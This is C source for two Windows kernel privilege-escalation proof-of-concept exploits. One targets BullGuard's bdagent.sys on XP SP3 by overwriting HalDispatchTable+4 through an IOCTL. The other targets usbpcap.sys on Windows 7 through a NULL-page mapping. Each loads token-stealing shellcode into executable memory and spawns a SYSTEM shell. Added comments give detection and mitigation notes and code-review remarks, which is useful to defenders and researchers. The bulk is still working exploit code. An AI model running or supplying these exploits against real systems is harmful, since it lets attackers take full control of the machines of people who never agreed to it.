/*
 * PoC entry point: local privilege-escalation test against the bdagent.sys
 * driver on Windows XP SP3 (32-bit), as the banner states.  Flow: open the
 * device, use IOCTL 0x0022405c to write the address of a user-mode buffer
 * over HalDispatchTable+4, reach that entry through NtQueryIntervalProfile,
 * spawn a shell, then send a second IOCTL to restore the original pointers.
 *
 * Defender notes:
 *  - Detection: a user-mode process opening \\.\bdagent and issuing IOCTL
 *    0x0022405c with a zero-length output buffer whose pointer is a kernel
 *    address, followed by NtQueryIntervalProfile, is the observable sequence.
 *  - Mitigation: the driver must probe any caller-supplied output pointer and
 *    honour the supplied output length; on later hardware/OS, SMEP blocks
 *    the kernel-to-user-mode jump this flow depends on.
 *
 * argc/argv are unused.  Returns 0 on success, -1 on any setup failure.
 * GetWindowsVersion, HalDispatchTableAddress, spawnShell, token_steal_xp,
 * restore_pointers_xp, BUFSIZE and the _NtQueryIntervalProfile typedef are
 * defined elsewhere in the file.
 */
int main(int argc, char *argv[])
{
    _NtQueryIntervalProfile NtQueryIntervalProfile;
    LPVOID input[1] = {0};              /* IOCTL input buffer: a single pointer */
    LPVOID addrtoshell;                 /* RWX user-mode page holding the payload */
    HANDLE hDevice;
    DWORD dwRetBytes = 0;
    DWORD HalDispatchTableTarget;       /* kernel address handed to the IOCTL as "output buffer" */
    ULONG time = 0;
    /* NOTE(review): declared unsigned char but passed to sprintf/CreateFile, which take char * (sign-mismatch warning). */
    unsigned char devhandle[MAX_PATH];

    printf("-------------------------------------------------------------------------------\n");
    printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n");
    printf(" Tested on Windows XP SP3 (32bit) \n");
    printf("-------------------------------------------------------------------------------\n\n");

    /* GetWindowsVersion() is defined elsewhere; per these checks 1 means XP and 0 means unsupported. */
    if (GetWindowsVersion() == 1) {
        printf("[i] Running Windows XP\n");
    }
    if (GetWindowsVersion() == 0) {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }

    /* Device path "\\.\bdagent".  sprintf is unbounded, but the literal fits in MAX_PATH. */
    sprintf(devhandle, "\\\\.\\%s", "bdagent");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
    if (!NtQueryIntervalProfile) {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;
    }

    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addrtoshell == NULL) {
        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    /* NOTE(review): %x with a pointer argument is a format/argument mismatch (UB); %p is the matching specifier. */
    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
    memset(addrtoshell, 0x90, BUFSIZE);     /* fill with x86 NOP (0x90) before copying the payload in */
    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
    /* NOTE(review): sizeof yields size_t; %d expects int (use %zu). */
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));

    hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    } else {
        printf("[+] Open %s device successful\n", devhandle);
    }

    /* Second slot of the HAL dispatch table (+4 on 32-bit); HalDispatchTableAddress() is resolved elsewhere in the file. */
    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

    input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
    /* NOTE(review): pointer printed with %x; should be %p. */
    printf("[+] Input buffer contents %08x\n", input[0]);

    printf("[~] Press any key to send Exploit . . .\n");
    getch();    /* NOTE(review): getch is the deprecated POSIX-style name; _getch from <conio.h> is the supported one */

    /*
     * Output buffer pointer is the kernel address, output length is 0.  The
     * return value is not checked, so a failed IOCTL is indistinguishable
     * from success before the trigger below.
     */
    DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
    printf("[+] Buffer sent\n");

    printf("[+] Spawning SYSTEM Shell\n");
    /* This system call dispatches through HalDispatchTable+4, i.e. the entry overwritten above. */
    NtQueryIntervalProfile(2, &time);
    spawnShell();   /* defined elsewhere in the file */

    /*
     * Write the original pointers back so the system stays stable.  The -1
     * suggests restore_pointers_xp is a string literal whose terminating NUL
     * is not sent - confirm.  Return value again unchecked.
     */
    printf("[+] Restoring Hal dispatch table pointers\n\n");
    DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
    CloseHandle(hDevice);
    return 0;
}
/*
 * PoC entry point: local privilege-escalation test against usbpcap.sys on
 * Windows 7 SP1 (32-bit), as the banner states.  Flow: place the payload in
 * an RWX user page, map the NULL page with NtAllocateVirtualMemory, write a
 * page image containing the payload pointer into it, then open
 * \\.\usbpcap1, issue IOCTL 0x00090028 and spawn a shell.
 *
 * Defender notes:
 *  - Mitigation: Windows 8 and later refuse to map the NULL page for ordinary
 *    processes, which removes this class of NULL-dereference exploit; the
 *    driver-side fix is to validate the pointer it dereferences before use.
 *  - Detection: a process allocating at base address 0/1 via
 *    NtAllocateVirtualMemory and then opening \\.\usbpcap1 is the observable
 *    sequence.
 *
 * argc/argv are unused.  Returns 0 on success, -1 on any setup failure.
 * spawnShell, token_steal_w7, BUFSIZE and the _NtAllocateVirtualMemory
 * typedef are defined elsewhere in the file.
 */
int main(int argc, char *argv[])
{
    _NtAllocateVirtualMemory NtAllocateVirtualMemory;
    LPVOID addrtoshell;                     /* RWX user-mode page holding the payload */
    NTSTATUS allocstatus;
    /* NtAllocateVirtualMemory rounds BaseAddress down to page granularity, so this requests page 0 (the NULL page). */
    LPVOID base_addr = (LPVOID)0x00000001;
    DWORD written;
    int rwresult;
    /* NOTE(review): passed as RegionSize; int matches SIZE_T width only on 32-bit builds. */
    int size = BUFSIZE;
    HANDLE hDevice;
    DWORD dwRetBytes = 0;
    unsigned char buffer[BUFSIZE];          /* image that will be written over the NULL page */
    /* NOTE(review): declared unsigned char but used as char * by sprintf/CreateFile (sign-mismatch warning). */
    unsigned char devhandle[MAX_PATH];

    printf("-------------------------------------------------------------------------------\n");
    printf(" USBPCAP (usbpcap.sys) Null Pointer Dereference EoP Exploit \n");
    printf(" Tested on Windows 7 SP1 (32bit) \n");
    printf("-------------------------------------------------------------------------------\n\n");

    /* Device path "\\.\usbpcap1".  sprintf is unbounded, but the literal fits in MAX_PATH. */
    sprintf(devhandle, "\\\\.\\%s", "usbpcap1");

    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addrtoshell == NULL) {
        printf("[-] VirtualAlloc memory allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc memory allocated at %p\n", addrtoshell);
    memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));
    /* NOTE(review): sizeof yields size_t; %d expects int (use %zu). */
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));

    NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
    if (!NtAllocateVirtualMemory) {
        printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
        return -1;
    }
    printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
    printf("[+] Allocating memory at [0x%p]\n", base_addr);

    /* INVALID_HANDLE_VALUE is (HANDLE)-1, which doubles as the current-process pseudo-handle. */
    allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (allocstatus) {  /* any non-zero NTSTATUS (including warning codes) is treated as failure */
        printf("[-] An error occured while mapping executable memory (0x%08x) %d\n\n", allocstatus, GetLastError());
        return -1;
    }
    printf("[+] NtAllocateVirtualMemory successful\n");

    /*
     * Build the page image: all zero except the payload pointer at offset
     * 0x6b.  The image is written starting at address 1, so the pointer ends
     * up at address 0x6c.  NOTE(review): the offset presumably matches the
     * field the driver dereferences - confirm against the driver.  The
     * hard-coded 4 equals sizeof(LPVOID) only on 32-bit.
     */
    memset(buffer, 0x00, BUFSIZE);
    memcpy(buffer+0x0000006b, &addrtoshell, 4);
    rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
    if (rwresult == 0) {
        printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
        return -1;
    }
    printf("[+] WriteProcessMemory %d bytes written\n", written);

    printf("[+] Device handle %s\n", devhandle);
    /*
     * dwDesiredAccess is 0, so the handle carries no read/write rights.
     * NOTE(review): the IOCTL is evidently still reachable, which suggests it
     * is defined with FILE_ANY_ACCESS - restricting the device ACL / IOCTL
     * access bits is the usual hardening.
     */
    hDevice = CreateFile(devhandle, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    } else {
        printf("[+] Open %s device successful\n", devhandle);
    }

    printf("[~] Press any key to send Exploit . . .\n");
    getch();    /* NOTE(review): getch is the deprecated name; _getch from <conio.h> is the supported one */

    /* No input or output buffers; the return value is not checked. */
    DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL);
    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    spawnShell();   /* defined elsewhere in the file */
    return 0;
}